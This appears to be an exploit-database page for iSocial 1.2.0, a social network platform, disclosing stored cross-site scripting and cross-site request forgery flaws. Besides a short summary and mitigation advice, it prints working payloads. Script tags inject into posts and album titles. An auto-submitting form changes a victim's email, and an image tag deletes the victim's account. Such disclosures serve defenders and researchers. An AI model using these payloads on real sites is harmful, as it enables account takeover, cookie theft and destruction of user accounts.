header-logo
Suggest Exploit
vendor:
iSocial
by:
Borna nematzadeh (L0RD)
N/A
CVSS
MEDIUM
Cross-Site Scripting / Cross-Site Request Forgery
79
CWE
Product Name: iSocial
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2018

iSocial 1.2.0 – Cross-Site Scripting / Cross-Site Request Forgery

The iSocial 1.2.0 version is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. The XSS vulnerability allows an attacker to inject malicious scripts into the website, which can be executed by unsuspecting users. The CSRF vulnerability allows an attacker to perform unauthorized actions on behalf of a victim user, such as changing their email or deleting their account.

Mitigation:

To mitigate the XSS vulnerability, it is recommended to implement proper input validation and output encoding. To mitigate the CSRF vulnerability, it is recommended to implement CSRF tokens and enforce strict referer checks.
Source

Exploit-DB raw data:

# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux

# POC 1 : Cross-Site scripting:

1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .

# POC 2 : Cross-Site Scripting:

1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases , the payload will be executed after someone opens your
album or your profile.

# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .

# Change email Exploit :

<html>
<head>
   <title>CSRF POC</title>
</head>
  <body>
    <form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
      <input type="hidden" name="em" value="lord2&#64;gmail&#46;com" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

# Result :
# html    "The information has been updated"
# status    "OK"
# message    ""

# Delete account Exploit:

<img src="
http://Target/isocial/demo/services/actionssetting/delete">

Navigation

Suggest Exploit

Services By CQR